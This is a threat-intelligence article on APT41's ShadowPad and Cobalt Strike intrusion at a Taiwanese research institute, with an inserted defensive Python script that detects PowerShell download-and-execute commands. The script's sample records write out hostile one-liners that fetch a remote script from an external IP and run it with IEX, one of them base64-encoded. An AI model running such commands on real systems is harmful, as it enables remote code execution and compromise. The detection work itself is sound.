A new cyber espionage campaign by the China-linked state-sponsored threat actor tracked as APT41 has been observed targeting an unnamed Taiwanese government-affiliated research institute with the ShadowPad malware and the Cobalt Strike tool.
The breach, according to Cisco Talos, likely began as early as July 2023, with the attackers abusing an outdated and vulnerable version of the Microsoft Office IME binary as a loader to deliver a customized second-stage loader, which subsequently launched the ShadowPad payload. In addition, APT41 developed a tailored loader to inject a proof-of-concept for the CVE-2018-0824 remote code execution vulnerability directly into memory to achieve local privilege escalation.
Cisco Talos said it detected unusual PowerShell commands that connected to an external IP address to download and execute PowerShell scripts within the compromised environment of the research institute, which specializes in computing and associated technologies.
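The kind of check Talos describes above (PowerShell reaching out to an external address to fetch and run a script) can be approximated with a triage rule over process-creation telemetry. The Python script below is an added example written for this page; it is not Talos tooling and is not derived from the actual commands seen in the intrusion. The log records, IP addresses (RFC 5737 documentation ranges) and scripts it scans are constructed, and the patterns are a starting point rather than a complete signature set. It flags PowerShell command lines that combine a download cradle with in-memory execution or with an IP literal outside the RFC 1918, loopback and link-local ranges, decoding any `-EncodedCommand` argument first so that base64 does not hide the indicators.

```python
import base64
import binascii
import ipaddress
import re

# Download cradles and in-memory execution primitives typical of
# PowerShell download-and-execute one-liners (illustrative, not exhaustive).
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod"
    r"|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_IPV4_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})", re.I)
# Address space treated as internal; anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def decode_encoded_command(cmd_line):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmd_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def external_ips(text):
    """IPv4 literals inside URLs that fall outside INTERNAL_NETS."""
    found = []
    for ip in URL_IPV4_RE.findall(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if not any(addr in net for net in INTERNAL_NETS):
            found.append(ip)
    return found


def assess(cmd_line):
    """Score one command line and report which indicators matched."""
    decoded = decode_encoded_command(cmd_line)
    text = cmd_line if decoded is None else cmd_line + " " + decoded
    download = bool(DOWNLOAD_RE.search(text))
    execute = bool(EXEC_RE.search(text))
    ips = external_ips(text)
    if download and (execute or ips):
        severity = "high"
    elif download or execute or decoded is not None:
        severity = "medium"
    else:
        severity = "low"
    return {"severity": severity, "download": download, "execute": execute,
            "encoded": decoded is not None, "external_ips": ips}


def triage(events):
    """Assess (image, command_line) records for PowerShell hosts; return medium/high hits in order."""
    hits = []
    for image, cmd in events:
        name = image.lower()
        if "powershell" not in name and "pwsh" not in name:
            continue
        verdict = assess(cmd)
        if verdict["severity"] != "low":
            hits.append((cmd, verdict))
    return hits


def encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation records: (image path, command line).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    (PS, "powershell.exe -NoProfile -ep Bypass -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('http://203.0.113.25/update.ps1')\""),
    (PS, "powershell -w hidden -enc " + encode_ps(
        "Invoke-WebRequest -Uri http://198.51.100.7/a.ps1 -OutFile a.ps1; IEX (Get-Content a.ps1 -Raw)")),
    (PS, r"powershell.exe Get-ChildItem C:\Users\alice\Documents"),
    (PS, r"powershell.exe -File \\10.0.0.5\scripts\inventory.ps1"),
    (PS, "powershell Invoke-WebRequest -Uri http://10.10.4.7/agent.ps1 -OutFile agent.ps1"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe IEX DownloadString http://203.0.113.9/x"),
]

if __name__ == "__main__":
    for cmd, verdict in triage(SAMPLE_EVENTS):
        print(verdict["severity"].upper(), verdict["external_ips"], cmd[:80])
```

Run against the constructed records, the two download-and-execute lines (one plain, one hidden behind `-enc`) score high, the fetch from an internal address scores medium for analyst review, and the plain directory listing and the non-PowerShell process are dropped. In production the internal-range list would be replaced by the organisation's own address plan and the rule fed from Sysmon event ID 1 or PowerShell script block logging rather than an inline list.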
ShadowPad, widely regarded as the successor to PlugX, is a modular remote access trojan (RAT) primarily used by Chinese hacking groups. It has been notably associated with APT41, a group believed to be based in Chengdu, China. ShadowPad has also been utilized by other Chinese hacking groups, such as Mustang Panda and the Tonto Team.
The most recent attack by the group involved a unique Cobalt Strike loader written in GoLang, designed to evade detection by Windows Defender. This loader, based on the anti-AV loader CS-Avoid-Killing hosted on GitHub, contains file and directory path strings in Simplified Chinese, suggesting the threat actors were proficient in the language. The repository is actively promoted in multiple Chinese hacking forums and technical tutorial articles.
Upon gaining access to the network, the attackers established a foothold by executing malicious code and binaries. They then installed a webshell to facilitate further discovery and execution activities. The threat actors also deployed additional malware, including ShadowPad and Cobalt Strike, using three different methods: through the installed webshell, via RDP access, and using a reverse shell.
During the compromise, the attackers attempted to exploit CVE-2018-0824 using a tool called UnmarshalPwn, a proof-of-concept that exploits the flaw to achieve local privilege escalation.